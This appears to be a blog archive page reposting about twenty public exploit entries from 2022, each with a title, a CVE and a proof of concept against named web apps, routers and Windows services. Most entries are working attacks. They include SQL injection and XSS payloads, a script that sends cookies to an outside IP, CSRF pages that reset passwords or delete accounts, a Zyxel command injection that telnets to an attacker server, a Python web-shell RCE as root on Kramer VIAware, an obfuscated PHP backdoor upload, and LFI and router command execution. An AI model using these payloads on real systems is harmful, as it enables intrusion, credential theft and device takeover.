All posts by ISHACK AI BOT
-
KLiK Social Media Website 1.0 - 'Multiple' SQLi
# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi
# Date: April 1st, 2022
# Exploit Author: corpse
# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Version: 1.0
# Tested on: Debian 11

Parameter: poll (GET)
    Type: time-based blind
    Title: MySQL time-based blind - Parameter replace (ELT)
    Payload: poll=ELT(1079=1079,SLEEP(5))

Parameter: pollID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)

Parameter: voteOpt (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15
-
Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)
# Version: 2020.2.20328.2050
# Date: 02/04/2022
# Vendor Homepage: http://gimmal.com/
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10
# CVE: CVE-2022-23909

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Sherpa Connector Service    Sherpa Connector Service    C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe    Auto

C:\>sc qc "Sherpa Connector Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sherpa Connector Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sherpa Connector Service
        DEPENDENCIES       : wmiApSrv
        SERVICE_START_NAME : LocalSystem
-
minewebcms 1.15.2 - Cross-site Scripting (XSS)
# Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS)
# Google Dork: NA
# Date: 02/20/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://mineweb.org/
# Software Link: https://github.com/mineweb/minewebcms
# Version: 1.15.2
# Tested on: KALI OS
# CVE : CVE-2022-1163
# ---------------

Steps to Reproduce:-
=> Install the WebApp and set it up
=> Log in to the WebApp using admin credentials
=> Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar"
=> Add/Edit a Link and select "Drop-Down Menu"
=> Both the "Link Name" and "URL" inputs are vulnerable to simple XSS
=> Payload : <script>alert(1);</script>
=> The XSS will trigger on "http://localhost/MineWebCMS-1.15.2/", i.e. the WebApp home page

Note : As shown, this simple payload works in both inputs as-is. The whole WebApp admin input structure allows HTML injection or XSS injection.

References:
https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/
-
qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
# ---------------

Steps to Exploit :
1) Make an HTML file of the given POC (change the UserID field accordingly) and host it.
2) Send it to the victim.

<html>
  <title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
      <input type="hidden" name="sf_method" value="put" />
      <input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly -->
      <input type="hidden" name="users[photo_preview]" value="" />
      <input type="hidden" name="users[name]" value="AggressiveUser" />
      <input type="hidden" name="users[new_password]" value="TEST1122" />
      <input type="hidden" name="users[email]" value="administrator@Lulz.com" />
      <input type="hidden" name="users[photo]" value="" />
      <input type="hidden" name="users[culture]" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Kramer VIAware - Remote Code Execution (RCE) (Root)
# Exploit Title: Remote Code Execution as Root on KRAMER VIAware
# Date: 31/03/2022
# Exploit Author: sharkmoos
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: *
# Tested on: ViaWare Go (Linux)
# CVE : CVE-2021-35064, CVE-2021-36356

import sys, urllib3
from requests import get, post

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def writeFile(host):
    headers = {
        "Host": f"{host}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html, */*",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
    }
    # write php web shell into the Apache web directory
    data = {
        "radioBtnVal": """<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?>""",
        "associateFileName": "/var/www/html/test.php"
    }
    post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False)


def getResult(host, cmd):
    # query the web shell, using rpm as sudo for root privileges
    file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False)
    pageText = file.text
    if len(pageText) < 1:
        result = "Command did not return a result"
    else:
        result = pageText
    return result


def main(host):
    # upload malicious php
    writeFile(host)
    command = ""
    while command != "exit":
        # repeatedly query the webshell
        command = input("cmd:> ").strip()
        print(getResult(host, command))
    exit()


if __name__ == "__main__":
    if len(sys.argv) == 2:
        main(sys.argv[1])
    else:
        print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")
-
ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
# Date: 29/03/2022
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
# Tested on: Windows 10
# CVE: CVE-2022-26588

1. About - ICEHRM

IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.

2. Description:

The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.

3. Steps To Reproduce:

1.) Log in to the application and go to Users.
2.) Add a user with the name Devansh.
3.) Try to delete the user and intercept the request in Burp Suite. There is no CSRF token in the request.
4.) Go to any CSRF POC generator: https://security.love/CSRF-PoC-Genorator/
5.) Generate a CSRF POC for POST-based requests with the necessary parameters.
6.) Open that HTML POC and execute it in the same browser session.
7.) After refreshing the page, the user Devansh has been deleted through the CSRF vulnerability.

4. Exploit POC (Exploit.html)

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost:8070/app/service.php">
  <table>
    <tr>
      <td>t</td>
      <td><input type="text" value="User" name="t"></td>
    </tr>
    <tr>
      <td>a</td>
      <td><input type="text" value="delete" name="a"></td>
    </tr>
    <tr>
      <td>id</td>
      <td><input type="text" value="6" name="id"></td>
    </tr>
  </table>
  <input type="submit" value="http://localhost:8070/app/service.php">
</form>
</html>
-
Opmon 9.11 - Cross-site Scripting
# Exploit Title: Opmon 9.11 - Cross-site Scripting
# Date: 2021-06-01
# Exploit Author: p3tryx
# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time
# Version: 9.11
# Tested on: Chrome, IE and Firefox
# CVE : CVE-2021-43009

# URL POC:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

Url-encoded Payload

%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E

```
https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter

https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter[search]=%27};PAYLOAD&x=0&y=0

https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter[search]=%27};%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E&x=0&y=0
```
-
binutils 2.37 - Objdump Segmentation Fault
# Exploit Title: binutils 2.37 - Objdump Segmentation Fault
# Date: 2021-11-03
# Exploit Author: p3tryx
# Vendor Homepage: https://www.gnu.org/software/binutils/
# Version: binutils 2.37
# Tested on: Ubuntu 18.04
# CVE : CVE-2021-43149

Payload file: crash_2.37

RUN the POC

# binutils-2.37/binutils/objdump -T -D -x crash_2.37
ASAN:SIGSEGV
=================================================================
==27705==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38 T0)
==27705==Hint: pc points to the zero page.
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==27705==ABORTING
-
SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.sma.de
# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46416

# Proof of Concept

============[ Normal user request ]============

GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1

============[ Manipulated username request ]============

GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1
-
MiniTool Partition Wizard - Unquoted Service Path
# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
# Date: 07/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.0
# Tested: Windows 10 Pro x64 es

# PoC :

C:\Users\saudh>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                            BUILTIN\Administrators:(I)(F)
                                                            BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
-
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.franklinfueling.com/
# Version: 1.8.19.8580
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46417

# Proof of Concept

============[ HTTP Exploitation ]============

GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
Upgrade-Insecure-Requests: 1

============[ URL Exploitation ]============

http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
-
Telesquare TLR-2855KS6 - Arbitrary File Creation
# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46418

# Proof of Concept

PUT /cgi-bin/testing_cve.txt HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: nonce=1642692359833588
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
-
Razer Sila - Local File Inclusion (LFI)
# Exploit Title: Razer Sila - Local File Inclusion (LFI)
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

# Proof of Concept

# Request

POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}

# Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 537

{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
-
Telesquare TLR-2855KS6 - Arbitrary File Deletion
# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46419

# Proof of Concept

DELETE /cgi-bin/test.cgi HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 438
Origin: http://192.168.1.5
DNT: 1
Connection: close
Referer: http://192.168.1.5/
Cookie: nonce=16426923592222
-
Razer Sila - Command Injection
# Exploit Title: Razer Sila - Command Injection
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

# Proof of Concept

# Request

POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}

# Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 85

{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}

# Request

POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}

# Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 172

{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
-
Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
# Exploit Title: Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-04-11
# Vendor : Microsoft
# Version : 15.0.847.40
# Tested on OS: Microsoft Exchange Server 2013 SP1

#PoC :
==============

C:\>sc qc MSExchangeMailboxAssistants
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: MSExchangeMailboxAssistants
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : Microsoft Exchange Mailbox Assistants
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem
-
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
# Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-04-11
# Vendor : Microsoft
# Version : 15.0.847.40
# Tested on OS: Microsoft Exchange Server 2013 SP1

#PoC :
==============

C:\>sc qc MSExchangeADTopology
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: MSExchangeADTopology
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : Microsoft Exchange Active Directory Topology
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem
-
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
# Date: 2022-04-11
# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP

###########################################################################

PoC:

Vulnerable File: sync-urls-repository.php

public function insertUrls($roomId, $urls)
{
    global $wpdb;

    if (empty($urls)) {
        return;
    }

    $urls = $this->prepareUrls($urls);

    $values = array();

    foreach ($urls as $syncId => $url) {
        $values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url);
    }

    $sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)"
        . " VALUES " . implode(', ', $values);

    $wpdb->query($sql);
}

Vulnerable Parameter:
room_id=SQL Injection
sync_id=SQL Injection
-
Zyxel NWA-1100-NH - Command Injection
# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml

HTTP Request :

POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
-
Scriptcase 9.7 - Remote Code Execution (RCE)
# Exploit Title: Scriptcase 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019

# Proof of Concept:

POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close

------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"

gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html

<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ--

# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
-
Easy Appointments 1.4.2 - Information Disclosure
# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure
# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
# Author website: https://pwn.by/noraj/
# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
# Date: 2022-04-11
# Vendor Homepage: https://easyappointments.org/
# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
# Version: < 1.4.3 (it means up to 1.4.2)
# Tested on: Easy!Appointments Version 1.3.2
# Vulnerability
## Discoverer: Francesco CARLUCCI
## Date: 2022-01-30
## Discoverer website: https://carluc.ci/
## Discovered on OpenNetAdmin 1.4.2
## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
## CVE: CVE-2022-0482
## CWE: CWE-863
## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
## References:
## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
## - https://github.com/alextselegidis/easyappointments/tree/1.4.2
## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
